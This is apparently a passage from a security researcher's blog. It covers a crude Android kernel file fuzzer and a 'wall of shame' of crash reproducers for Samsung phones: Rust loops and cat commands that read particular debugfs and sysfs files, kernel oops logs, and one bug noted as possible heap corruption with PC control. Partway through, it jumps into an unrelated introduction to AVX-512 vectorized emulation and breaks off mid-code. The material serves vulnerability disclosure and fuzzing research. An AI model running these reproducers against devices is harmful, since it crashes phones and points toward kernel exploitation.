So currently we have no idea which files were touched to cause the crash. We can print them and then view them over ADB, however this doesn’t sync when the phone panics… we need something better.

Perhaps we should just send the filenames we’re fuzzing over the network and then have a service that acks the filenames, such that the files are not touched unless they have been confirmed to be reported over the wire. Maybe this would be too slow? Hard to say. Let’s give it a go!

We’ll make a quick server in Rust to run on our host, and then let the phone connect to this server over ADB USB via adb reverse tcp:13370 tcp:13370, which will forward connections to 127.0.0.1:13370 on the phone to our host where our program is running and will log filenames.

Designing a terrible protocol

We need a quick protocol that works over TCP to send filenames. I’m thinking something super easy. Send the filename, and then the server responds with “ACK”. We’ll just ignore threading issues and the fact that heap corruption bugs will usually show up after the file was accessed. We don’t want to get too carried away and make a reasonable fuzzer, eh?

use std::net::TcpListener;
use std::io::{Read, Write};

fn main() -> std::io::Result<()> {
    let listener = TcpListener::bind("0.0.0.0:13370")?;

    let mut buffer = vec![0u8; 64 * 1024];

    for stream in listener.incoming() {
        print!("Got new connection\n");

        let mut stream = stream?;

        loop {
            if let Ok(bread) = stream.read(&mut buffer) {
                // Connection closed, break out
                if bread == 0 {
                    break;
                }

                // Send acknowledge
                stream.write(b"ACK").expect("Failed to send ack");
                stream.flush().expect("Failed to flush");

                let string = std::str::from_utf8(&buffer[..bread])
                    .expect("Invalid UTF-8 character in string");
                print!("Fuzzing: {}\n", string);
            } else {
                // Failed to read, break out
                break;
            }
        }
    }

    Ok(())
}

This server is pretty trash, but it’ll do. It’s a fuzzer anyways, can’t find bugs without buggy code.

Client side

From the phone we just implement a simple function:

// Connect to the server we report to and pass this along to the functions
// and threads that need socket access
let stream = Arc::new(Mutex::new(TcpStream::connect("127.0.0.1:13370")
    .expect("Failed to open TCP connection")));

fn inform_filename(handle: &Mutex<TcpStream>, filename: &str) {
    // Report the filename
    let mut socket = handle.lock().expect("Failed to lock mutex");
    socket.write_all(filename.as_bytes()).expect("Failed to write");
    socket.flush().expect("Failed to flush");

    // Wait for an ACK
    let mut ack = [0u8; 3];
    socket.read_exact(&mut ack).expect("Failed to read ack");
    assert!(&ack == b"ACK", "Did not get ACK as expected");
}

Developing blacklist

Okay so now we have a log of all files we’re fuzzing, and they’re confirmed by the server so we don’t lose anything. Let’s set it into single-threaded mode so we don’t have to worry about race conditions for now.

We’ll see it frequently gets hung up on files. We’ll make note of the files it gets hung up on and start developing a blacklist. This takes some manual labor, and usually there are a handful (5-10) files we need to put in this list. I typically make my blacklist based on the start of a filename, thus I can blacklist entire directories based on starts_with matching.
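
As a rough illustration of that approach, here’s a minimal sketch of prefix-based filtering with starts_with (the prefixes and names below are examples of mine, not the actual per-phone lists):

// Example prefixes known to hang reads forever; real lists are built
// per-phone through the manual labor described above
const BLACKLIST: &[&str] = &[
    "/sys/kernel/debug/tracing",
    "/proc/kmsg",
];

fn is_blacklisted(path: &std::path::Path) -> bool {
    let path = path.to_string_lossy();
    BLACKLIST.iter().any(|&prefix| path.starts_with(prefix))
}

// After building the directory listing, drop anything blacklisted:
// dirlisting.retain(|(path, _, _)| !is_blacklisted(path));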

Back to fuzzing

So when fuzzing, the last file we saw touched before a crash was /sys/kernel/debug/smp2p_test/ut_remote_gpio_inout.

Let’s hammer this in a loop… and it worked! So now we can develop a fully self contained PoC:

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let fname = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(fname) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

What a top tier PoC!

Next bug?

So now that we have root caused the bug, we should blacklist the specific file we know caused the bug and try again. Potentially this bug was hiding another.

Nope, nothing else, the S5 is officially secure and fixed of all bugs.

The end of an era

Sadly this fuzzer is on the way out. It used to work almost universally on every phone, and still does if selinux is set to permissive. But sadly as time has gone on these bugs have become hidden behind selinux policies that prevent them from being reached. It now only works on a few phones that I have rather than all of them, but the fact that it ever worked is probably the best part of it all.

There is a lot that could be done to improve this fuzzer, but the goal of this article was to make a terrible fuzzer, not a reasonable one. The big things to add to make this better:

  • Make it perform random ioctl() calls
  • Make it attempt to mmap() and use the mappings for these devices
  • Actually understand what the file expects
  • Use multiple processes or something to let the fuzzer continue to run when it gets stuck
  • Run it for more than 1 minute before giving up on a phone
  • Make better blacklists/whitelists

In the future maybe I’ll exploit one of these bugs in another blog, or root cause them in source.

Wall of Shame

Try it out on your own test phones (not on your actual phone, that’d probably be a bad idea). Let me know if you have any silly bugs found by this to add to the wall of shame.

G900F (Exynos Galaxy S5) [G900FXXU1CRH1] (August 1, 2017)

PoC

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let fname = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(fname) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

J200H (Galaxy J2) [J200HXXU0AQK2] (August 1, 2017)

not root caused, just run the fuzzer

[c0] Unable to handle kernel paging request at virtual address 62655726
[c0] pgd = c0004000
[c0] [62: ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
sp : ee457d20  ip : 00000000  fp : ee457d54
[c0] r10: ed859210  r9 : c0c833e4  r8 : ed859338
[c0] r7 : ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d0013 00000000 ffffffff ffffffff
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d[<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)
[c0] [<c003d6bc>] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/usb_serial0/readstatus

or

cat /sys/kernel/debug/usb_serial1/readstatus

or

cat /sys/kernel/debug/usb_serial2/readstatus

or

cat /sys/kernel/debug/usb_serial3/readstatus

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/mdp/xlog/dump

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/rpm_master_stats

J700H (Galaxy J7) [J700HXXU3BRC2] (August 1, 2017)

not root caused, just run the fuzzer

Unable to handle kernel paging request at virtual address ff00000107
pgd = ffffffc03409d000
[ff00000107] *pgd=0000000000000000
mms_ts 9-0048: mms_sys_fw_update [START]
mms_ts 9-0048: mms_fw_update_from_storage [START]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] file_open - path[/sdcard/melfas.mfsb]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] -3
mms_ts 9-0048: mms_sys_fw_update [DONE]
muic-universal:muic_show_uart_sel AP
usb: enable_show dev->enabled=1
sm5703-fuelga0000000000000000
Kernel BUG at ffffffc00034e124 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000004 [#1] PREEMPT SMP
exynos-snapshot: item - log_kevents is disabled
CPU: 4 PID: 9022 Comm: lulandroid Tainted: G        W    3.10.61-8299335 #1
task: ffffffc01049cc00 ti: ffffffc002824000 task.ti: ffffffc002824000
PC is at sysfs_open_file+0x4c/0x208
LR is at sysfs_open_file+0x40/0x208
pc : [<ffffffc00034e124>] lr : [<ffffffc00034e118>] pstate: 60000045
sp : ffffffc002827b70

G920F (Exynos Galaxy S6) [G920FXXU5DQBC] (February 1, 2017) Now gated by selinux :(

sec_debug_store_fault_addr 0xffffff80000fe008
Unhandled fault: synchronous external abort (0x96000010) at 0xffffff80000fe008
------------[ cut here ]------------
Kernel BUG at ffffffc0003b6558 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000010 [#1] PREEMPT SMP
exynos-snapshot: core register saved(CPU:0)
CPUMERRSR: 0000000012100088, L2MERRSR: 00000000111f41b8
exynos-snapshot: context saved(CPU:0)
exynos-snapshot: item - log_kevents is disabled
CPU: 0 PID: 5241 Comm: hookah Tainted: G        W      3.18.14-9519568 #1
Hardware name: Samsung UNIVERSAL8890 board based on EXYNOS8890 (DT)
task: ffffffc830513000 ti: ffffffc822378000 task.ti: ffffffc822378000
PC is at samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
LR is at samsung_pinconf_dbg_show+0x88/0xb0
Call trace:
[<ffffffc0003b6558>] samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
[<ffffffc0003b661c>] samsung_pinconf_dbg_show+0x84/0xb0
[<ffffffc0003b66d8>] samsung_pinconf_group_dbg_show+0x90/0xb0
[<ffffffc0003b4c84>] pinconf_groups_show+0xb8/0xec
[<ffffffc0002118e8>] seq_read+0x180/0x3ac
[<ffffffc0001f29b8>] vfs_read+0x90/0x148
[<ffffffc0001f2e7c>] SyS_read+0x44/0x84

G950F (Exynos Galaxy S8) [G950FXXU4CRI5] (September 1, 2018)

Can crash by getting PC in the kernel. Probably a race condition heap corruption. Needs a groom.

(This PC crash is old, since it’s corruption this is some old repro from an unknown version, probably April 2018 or so)

task: ffffffc85f672880 ti: ffffffc8521e4000 task.ti: ffffffc8521e4000
PC is at jopp_springboard_blr_x2+0x14/0x20
LR is at seq_read+0x15c/0x3b0
pc : [<ffffffc000c202b0>] lr : [<ffffffc00024a074>] pstate: a0000145
sp : ffffffc8521e7d20
x29: ffffffc8521e7d30 x28: ffffffc8521e7d90
x27: ffffffc029a9e640 x26: ffffffc84f10a000
x25: ffffffc8521e7ec8 x24: 00000072755fa348
x23: 0000000080000000 x22: 0000007282b8c3bc
x21: 0000000000000e71 x20: 0000000000000000
x19: ffffffc029a9e600 x18: 00000000000000a0
x17: 0000007282b8c3b4 x16: 00000000ff419000
x15: 000000727dc01b50 x14: 0000000000000000
x13: 000000000000001f x12: 00000072755fa1a8
x11: 00000072755fa1fc x10: 0000000000000001
x9 : ffffffc858cc5364 x8 : 0000000000000000
x7 : 0000000000000001 x6 : 0000000000000001
x5 : ffffffc000249f18 x4 : ffffffc000fcace8
x3 : 0000000000000000 x2 : ffffffc84f10a000
x1 : ffffffc8521e7d90 x0 : ffffffc029a9e600

PC: 0xffffffc000c20230:
0230  128001a1 17fec15d 128001a0 d2800015 17fec46e 128001b4 17fec62b 00000000
0250  01bc8a68 ffffffc0 d503201f a9bf4bf0 b85fc010 716f9e10 712eb61f 54000040
0270  deadc0de a8c14bf0 d61f0000 a9bf4bf0 b85fc030 716f9e10 712eb61f 54000040
0290  deadc0de a8c14bf0 d61f0020 a9bf4bf0 b85fc050 716f9e10 712eb61f 54000040
02b0  deadc0de a8c14bf0 d61f0040 a9bf4bf0 b85fc070 716f9e10 712eb61f 54000040
02d0  deadc0de a8c14bf0 d61f0060 a9bf4bf0 b85fc090 716f9e10 712eb61f 54000040
02f0  deadc0de a8c14bf0 d61f0080 a9bf4bf0 b85fc0b0 716f9e10 712eb61f 54000040
0310  deadc0de a8c14bf0 d61f00a0 a9bf4bf0 b85fc0d0 716f9e10 712eb61f 54000040

PoC

extern crate rand;

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // These are the 2 files we want to fuzz
    let random_paths = [
        "/sys/devices/platform/battery/power_supply/battery/mst_switch_test",
        "/sys/devices/platform/battery/power_supply/battery/batt_wireless_firmware_update"
    ];

    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    loop {
        // Pick a random file
        let file = &random_paths[rand::random::<usize>() % random_paths.len()];

        // Read a random number of bytes from the file
        if let Ok(mut fd) = File::open(file) {
            let rsz = rand::random::<usize>() % (buf.len() + 1);
            let _ = fd.read(&mut buf[..rsz]);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

Vectorized Emulation: Hardware accelerated taint tracking at 2 trillion instructions per second

14 October 2018 at 21:37

This is the introduction of a multipart series. It is to give a high level overview without really deeply diving into any individual component.

Read the next post in the series: MMU Design

Vectorized emulation, why do I do this to myself?

Changelog

Date Info
2018-10-14 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Performance disclaimer

All benchmarks done here are on a single Xeon Phi 7210 with 96 GiB of RAM. This comes out to about $4k USD, but if you cheap out on RAM and buy used Phis you could probably get the same setup for $1k USD.

This machine has 64 cores and 256 hardware threads. Using AVX-512 I run 4096 32-bit VMs at a time ((512 / 32) * 256).

All performance numbers in this article refer to the machine running at 100% on all cores.

Terminology

Term Inology
Lane A single component in a larger vector (often 32-bit throughout this document)
VM A single VM, in terms of vectorized emulation it refers to a single lane of a vector

Intro

In this blog I’m going to introduce you to a concept I’ve been working on for almost 2 years now. Vectorized emulation. The goal is to take standard applications and JIT them to their AVX-512 equivalent such that we can fuzz 16 VMs at a time per thread. The net result of this work allows for high performance fuzzing (approx 40 billion to 120 billion instructions per second [the 2 trillion clickbait number is theoretical maximum]) depending on the target, while gathering differential coverage on code, register, and memory state.

By gathering more than just code coverage we are able to track program state more deeply than code coverage alone, allowing us to fuzz through things like memcmp() without any hooks or static analysis of the target at all.

Further since we’re running emulated code we are able to run a soft MMU implementation which has byte-level permissions. This gives us stronger-than-ASAN memory protections, making bugs fail faster and cleaner.

How it came to be an idea

My history with fuzzing tools starts off effectively with my hypervisor for fuzzing, falkervisor. falkervisor served me well for quite a long time, but my work rotated more towards non-x86 targets, which it did not support. With a demand for emulation I made modifications to QEMU for high-performance fuzzing, and ultimately swapped out their MMU implementation for my own which has byte-level permissions. This new byte-level permission model allowed me to catch even the smallest memory corruptions, leading to finding pretty fun bugs!

More and more after working with QEMU I got annoyed. It’s designed for whole systems yet I was using it for fuzzing targets that were running with unknown hardware and running from dynamically dumped memory snapshots. Due to the level of abstraction in QEMU I started to get concerned with the potential unknowns that would affect the instrumentation and fuzzing of targets.

I developed my first MIPS emulator. It was not designed for performance, but rather purely for simple usage and perfect single stepping. You step an instruction, registers and memory get updated. No JIT, no intermediate registers, no flushing or weird block level translation changes. I eventually made a JIT for this that maintained the flush-state-every-instruction model and successfully used it against multiple targets. I also developed an ARM emulator somewhere in this timeframe.

When early 2017 rolls around I’m bored and want to buy a Xeon Phi. Who doesn’t want a 64-core 256-thread single processor? I really had no need for the machine so I just made up some excuse in my head that the high bandwidth memory on die would make reverting snapshots faster. Yeah… like that really matters? Oh well, I bought it.

While the machine was on the way I had this idea… when fuzzing from a snapshot all VMs initially start off fuzzing with the exact same state, except for maybe an input buffer and length being changed. Thus they do identical operations until user-controlled data is processed. I’ve done some fun vectorization work before, but what got me thinking is why not just emit vpaddd instead of add when JITting, and now I can run 16 VMs at a time!

Alas… the idea was born

A primer on snapshot fuzzing

Snapshot fuzzing is fundamental to this work and almost all fuzzing work I have done from 2014 and beyond. It warrants its own blog entirely.

Snapshot fuzzing is a method of fuzzing where you start from a partially-executed system state. For example I can run an application under GDB, like a parser, put a breakpoint after the file/network data has been read, and then dump memory and register state to a core dump using gcore. At this point I have full memory and register state for the application. I can then load up this core dump into any emulator, set up memory contents and permissions, set up register state, and continue execution. While this is an example with core dumps on Linux, this methodology works the same whether the snapshot is a core dump from GDB, a minidump on Windows, or even an exotic memory dump taken from an exploit on a locked-down device like a phone.

All that matters is that I have memory state and register state. From this point I can inject/modify the file contents in memory and continue execution with a new input!

It can get a lot more complex when dealing with kernel state, like file handles, network packets buffered in the kernel, and really anything that syscalls. However in most targets you can make some custom rigging using strace to know which FDs line up, where they are currently seeked, etc. Further a full system snapshot can be used instead of a single application and then this kernel state is no longer a concern.

The benefits of snapshot fuzzing are performance (linear scaling), high levels of introspection (even without source or symbols), and most importantly… determinism. Unless the emulator has bugs snapshot fuzzing is typically deterministic (sometimes relaxed for performance). Find some super exotic race condition while snapshot fuzzing? Well, you can single step through with the same input and now you can look at the trace as a human, even if it’s a 1 in a billion chance of hitting.

A primer on vectorized instruction sets

Since the 90s many computer architectures have some form of SIMD (vectorized) instruction set. SIMD stands for single instruction multiple data. This means that a single instruction performs an operation (typically the same) on multiple different pieces of data. SIMD instruction sets fall under names like MMX, SSE, AVX, AVX512 for x86, NEON for ARM, and AltiVec for PPC. You’ve probably seen these instructions if you’ve ever looked at a memcpy() implementation on any 64-bit x86 system. They’re the ones with the gross 15 character mnemonics and registers you didn’t even know existed.

For a simple case lets talk about standard SSE on x86. Since x86_64 started with the Pentium 4 and the Pentium 4 had up to SSE3 implementations, almost any x86_64 compiler will generate SSE instructions as they’re always valid on 64-bit systems.

SSE provides 128-bit SIMD operations to x86. SSE introduced 16 128-bit registers named xmm0 through xmm15 (only 8 xmm registers on 32-bit x86). These 128-bit registers can be treated as groups of different sized smaller pieces of data which sum up to 128 bits.

  • 4 single precision floats
  • 2 double precision floats
  • 2 64-bit integers
  • 4 32-bit integers
  • 8 16-bit integers
  • 16 8-bit integers

Now with a single instruction it is possible to perform the same operation on multiple floats or integers. For example there is an instruction paddd, which stands for packed add dwords. This means that the 128-bit registers provided are treated as 4 32-bit integers, and an add operation is performed.

Here’s a real example, adding xmm0 and xmm1 together treating them as 4 individual 32-bit integer lanes and storing them back into xmm0

paddd xmm0, xmm1

Register Dword 1 Dword 2 Dword 3 Dword 4
xmm0 5 6 7 8
xmm1 10 20 30 40
xmm0 (result) 15 26 37 48

Cool. Starting with AVX these registers were expanded to 256-bits thus allowing twice the throughput per instruction. These registers are named ymm0 through ymm15. Further AVX introduced three operand form instructions which allow storing a result to a different register than the ones being used in the operation. For example you can do vpaddd ymm0, ymm1, ymm2 which will add the 8 individual 32-bit integers in ymm1 and ymm2 and store the result into ymm0. This helps a lot with register scheduling and prevents many unnecessary movs just to save off registers before they are clobbered.

AVX-512

AVX-512 is a continuation of x86’s SIMD model by expanding from 16 256-bit registers to 32 512-bit registers. These registers are named zmm0 through zmm31. Further AVX-512 introduces 8 new kmask registers named k0 through k7 where k0 has a special meaning.

The kmask registers are used to perform masking on instructions, either by merging or zeroing. This makes it possible to loop through data and process it while having conditional masking to disable operations on a given lane of the vector.

The syntax for the common instructions using kmasks are the following:

vpaddd zmm0 {k1}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 9 33 44

or

vpaddd zmm0 {k1}{z}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 0 33 44

The first example uses k1 as the kmask for the add operation. In this case the k1 register is treated as a 16-bit number, where each bit corresponds to each of the 16 32-bit lanes in the 512-bit register. If the corresponding bit in k1 is zero, then the add operation is not performed and that lane is left unchanged in the resultant register.

In the second example there is a {z} suffix on the kmask register selection, this means that the operation is performed with zeroing rather than merging. If the corresponding bit in k1 is zero then the resultant lane is zeroed out rather than left unchanged. This gets rid of a dependency on the previous register state of the result and thus is faster, however it might not be suitable for all applications.

The k0 mask is implicit and does not need to be specified. The k0 register is hardwired to having all bits set, thus the operation is performed on all lanes unconditionally.

Prior to AVX-512, compare instructions in SIMD typically yielded all ones in a given lane if the comparison was true, or all zeroes if it was false. In AVX-512 comparison instructions are done using kmasks.

vpcmpgtd k2 {k1}, zmm10, zmm11

You may have seen this instruction in the picture at the start of the blog. What this instruction does is compare the 16 dwords in zmm10 with the 16 dwords in zmm11, and only performs the compare on lanes enabled by k1, and stores the result of the compare into k2. If the lane was disabled due to k1 then the corresponding bit in the k2 result will be zero. Meaning the only set bits in k2 will be from enabled lanes which were greater in zmm10 than in zmm11. Phew.

Vectorized emulation

Now that you’ve made it this far you might already have some gears turning in your head telling you where this might be going next.

Since with snapshot fuzzing we start executing the same code, we are doing the same operations. This means we can convert the x86 instructions to their vectorized counterparts and run 16 VMs at a time rather than just one.

Let’s make up a fake program:

mov eax, 5
mov ebx, 10
add eax, ebx
sub eax, 20

How can we vectorize this code?

; Register allocation:
; eax = zmm0
; ebx = zmm1

vpbroadcastd zmm0, dword ptr [memory containing constant 5]
vpbroadcastd zmm1, dword ptr [memory containing constant 10]
vpaddd       zmm0, zmm0, zmm1
vpsubd       zmm0, zmm0, dword ptr [memory containing constant 20] {1to16}

Well that was kind of easy. We’ve got a few new AVX concepts here. We’re using the vpbroadcastd instruction to broadcast a dword value to all lanes of a given ZMM register. Since the Xeon Phi is bottlenecked on the instruction decoder it’s actually faster to load from memory than it is to load an immediate into a GPR, move this into a XMM register, and then broadcast it out.

Further we introduce the {1to16} broadcasting that AVX-512 offers. This allows us to use a single dword constant value with, in our example, vpsubd. This broadcasts the dword at that memory location to all 16 lanes and then performs the operation. This saves one instruction as we don’t need an explicit vpbroadcastd.

In this case if we executed this code with any VM state we will have no divergence (no VMs do anything different), thus this example is very easy. It’s pretty much a 1-to-1 translation of the non-vectorized x86 to vectorized x86.

Alright, let’s try one a bit more complex, this time let’s work with VMs in different states:

add eax, 10

becomes

; Register allocation:
; eax = zmm0

vpaddd zmm0, zmm0, dword ptr [memory containing constant 10] {1to16}

Let’s imagine that the value in eax prior to execution is different, let’s say it’s [1, 2, 3, 4] for 4 different VMs (simplified, in reality there are 16).

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 1 2 3 4
const 10 10 10 10
zmm0 (result) 11 12 13 14

Oh? This is exactly what AVX is supposed to do… so it’s easy?

Okay it’s not that easy

So you might have noticed we’ve dodged a few things here that are hard. First we’ve ignored memory operations, and second we’ve ignored branches.

Let’s talk a bit about AVX memory

With AVX-512 we can load and store directly from/to memory, and ideally this memory is aligned as 512-bit registers are whole 64-byte cache lines. In AVX-512 we use the vmovdqa32 instruction. This will load an entire aligned 64-byte piece of memory into a ZMM register ala vmovdqa32 zmm0, [memory], and we can store with vmovdqa32 [memory], zmm0. Further when using kmasks with vmovdqa32 for loads the corresponding lane is left unmodified (merge masking) or zeroed (zero masking). For stores the value is simply not written if the corresponding mask bit is zero.

That’s pretty easy. But this doesn’t really work well when we have 16 unique VMs we’re running with unique address spaces.

… or does it?

VM memory interleaving

Since most VM memory operations are not affected by user input, and thus are the same in all VMs, we need a way to organize the 16 VMs’ memory such that we can access it all quickly. To do this we actually interleave all 16 VMs at the dword level (32-bit). This means we can perform a single vmovdqa32 to load or store to memory for all 16 VMs as long as they’re accessing the same address.

This is pretty simple, just interleave at the dword level:

chart simplified to show 4 lanes instead of 16

Guest Address Host Address Dword 1 Dword 2 Dword 3 Dword 16
0x0000 0x0000 1 2 3 33
0x0004 0x0040 32 74 55 45
0x0008 0x0080 24 24 24 24

All we need to do is take the guest address, multiply it by 16, and then vmovdqa32 from/to that address. It once again does not matter what the contents of the memory are for each VM and they can differ. The vmovdqa32 does not care about the memory contents.

In reality the host address is not just the guest address multiplied by 16 as we need some translation layer. But that will get its own entire blog. For now let’s just assume a flat, infinite memory model where we can just multiply by 16.

So what are the limitations of this model?

Well when reading bytes we must read the whole dword value and then shift and mask to extract the specific byte. When writing a byte we need to read the memory first, shift, mask, and or in the new byte, and write it out. And when doing non-aligned operations we need to perform multiple memory operations and combine the values via shifting and masking. Luckily compilers (and programmers) typically avoid these unaligned operations and they’re rare enough to not matter much.
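
To make the byte handling concrete, here’s a small Rust sketch of the flat model assumed above (no translation layer yet; host_index, load_byte, and store_byte are names of mine for illustration, not the real MMU): the guest dword index is scaled by 16 to find the interleaved host slot, and byte accesses go through the containing dword with shifts and masks.

const LANES: usize = 16;

// Host dword index (into a flat &[u32] of host memory) for a dword-aligned
// guest address in a given VM lane
fn host_index(guest_addr: u32, lane: usize) -> usize {
    assert!(guest_addr % 4 == 0 && lane < LANES);
    (guest_addr as usize / 4) * LANES + lane
}

// Byte read for one VM: load the containing dword, then shift and mask
fn load_byte(host: &[u32], guest_addr: u32, lane: usize) -> u8 {
    let dword = host[host_index(guest_addr & !3, lane)];
    ((dword >> ((guest_addr & 3) * 8)) & 0xff) as u8
}

// Byte write for one VM: read-modify-write of the containing dword
fn store_byte(host: &mut [u32], guest_addr: u32, lane: usize, val: u8) {
    let idx   = host_index(guest_addr & !3, lane);
    let shift = (guest_addr & 3) * 8;
    host[idx] = (host[idx] & !(0xffu32 << shift)) | ((val as u32) << shift);
}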

Divergence

So far everything we have talked about does not care about the values it is operating on at all, thus everything has been easy so far. But in reality values do matter. There are 3 places where divergence matters in this entire system:

  • Loads/stores with different addresses
  • Branches
  • Exceptions/faults

Loads/stores with different addresses

Let’s knock out the first one real quick, loads and stores with different addresses. For all memory accesses we do a very quick horizontal comparison of all the lanes first. If they have the same address then we take a fast path and issue a single vmovdqa32. If their addresses differ then we simply perform 16 individual memory operations and emulate the behavior we desire. It technically can get a bit better as AVX-512 has scatter/gather instructions which allow the CPU to do this loading/storing to different addresses for us. This is done with a base and an offset, but with 32 bits it’s not possible to address the whole address space we need. However with 64-bit vectorization (8 64-bit VMs) we can leverage scatter/gather instructions to their fullest and all loads and stores just become a fast path with one vmovdqa32, or a slow (but fast) path where we use a single scatter/gather instruction.
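
In (very simplified) Rust terms the dispatch looks something like the sketch below, reusing the ×16 interleaved layout from above; all names are my own, and in the real JIT the fast path is a single vmovdqa32 while the slow path is 16 scalar accesses or a gather/scatter on the 64-bit variant.

const LANES: usize = 16;

// Load one dword per VM; `guest_addrs` holds each lane's (dword-aligned)
// guest address and `host` is the interleaved flat host memory
fn load_dwords(host: &[u32], guest_addrs: &[u32; LANES]) -> [u32; LANES] {
    let mut out = [0u32; LANES];
    if guest_addrs.iter().all(|&a| a == guest_addrs[0]) {
        // Fast path: every VM reads the same address, one contiguous read
        let base = (guest_addrs[0] as usize / 4) * LANES;
        out.copy_from_slice(&host[base..base + LANES]);
    } else {
        // Slow path: one read per lane at that lane's own address
        for (lane, &addr) in guest_addrs.iter().enumerate() {
            out[lane] = host[(addr as usize / 4) * LANES + lane];
        }
    }
    out
}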

Branches

We’ve avoided this until now for a reason. It’s the single hardest thing in vectorized emulation. How can we possibly run 16 VMs at a time if one branches to another location? Now we cannot run an AVX-512 instruction as it would be invalid for the VMs which have gone down a different path.

Well it turns out this isn’t a terribly hard problem on AVX-512. And when I say AVX-512 I mean specifically AVX-512. Feel free to ponder why this might be based on what you’ve learned is unique to AVX-512.

Okay it’s kmasks. Did you get it right? Well kmasks save our lives. Remember the merging kmasks we talked about which would disable updates to a given lane of a vector and ignore writes to a given lane if it is not enabled in the kmask?

Well by using a kmask register on all JITted AVX-512 instructions we can simply change the kmask to disable updates on a given VM.

What this allows us to do is start execution at the same location on all 16 VMs as they start with the same EIP. On all branches we will horizontally compare the branch targets and compute a new kmask value to use when we continue execution on the new branch.

AVX-512 doesn’t have a great way of extracting or broadcasting arbitrary elements of a vector. However it has a fast way to broadcast the 0th lane in a vector ala vpbroadcastd zmm0, xmm0. This takes the first lane from xmm0 and broadcasts it to all 16 lanes in zmm0. We actually never stop following VM #0. This means VM #0 is always executing, which is important for all of the horizontal compares that we talk about. When I say horizontal compare I mean a broadcast of VM #0’s value and a compare with all other VMs.

Let’s look in-detail at the entire JIT that I use for conditional indirect branches:

; IL operation is Beqz(val, true_target, false_target)
;
; val          - 16 32-bit values to conditionally branch by
; true_target  - 16 32-bit guest branch target addresses if val == 0
; false_target - 16 32-bit guest branch target addresses if val != 0
;
; IL pseudocode:
;
; if val == 0 {
;    goto true_target;
; } else {
;    goto false_target;
; }
;
; Register usage
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; val   - Dynamically allocated zmm register containing val
; ttgt  - Dynamically allocated zmm register containing true_target
; ftgt  - Dynamically allocated zmm register containing false_target
; zmm0  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute a kmask `k2` which contains `1`s for the corresponding lanes
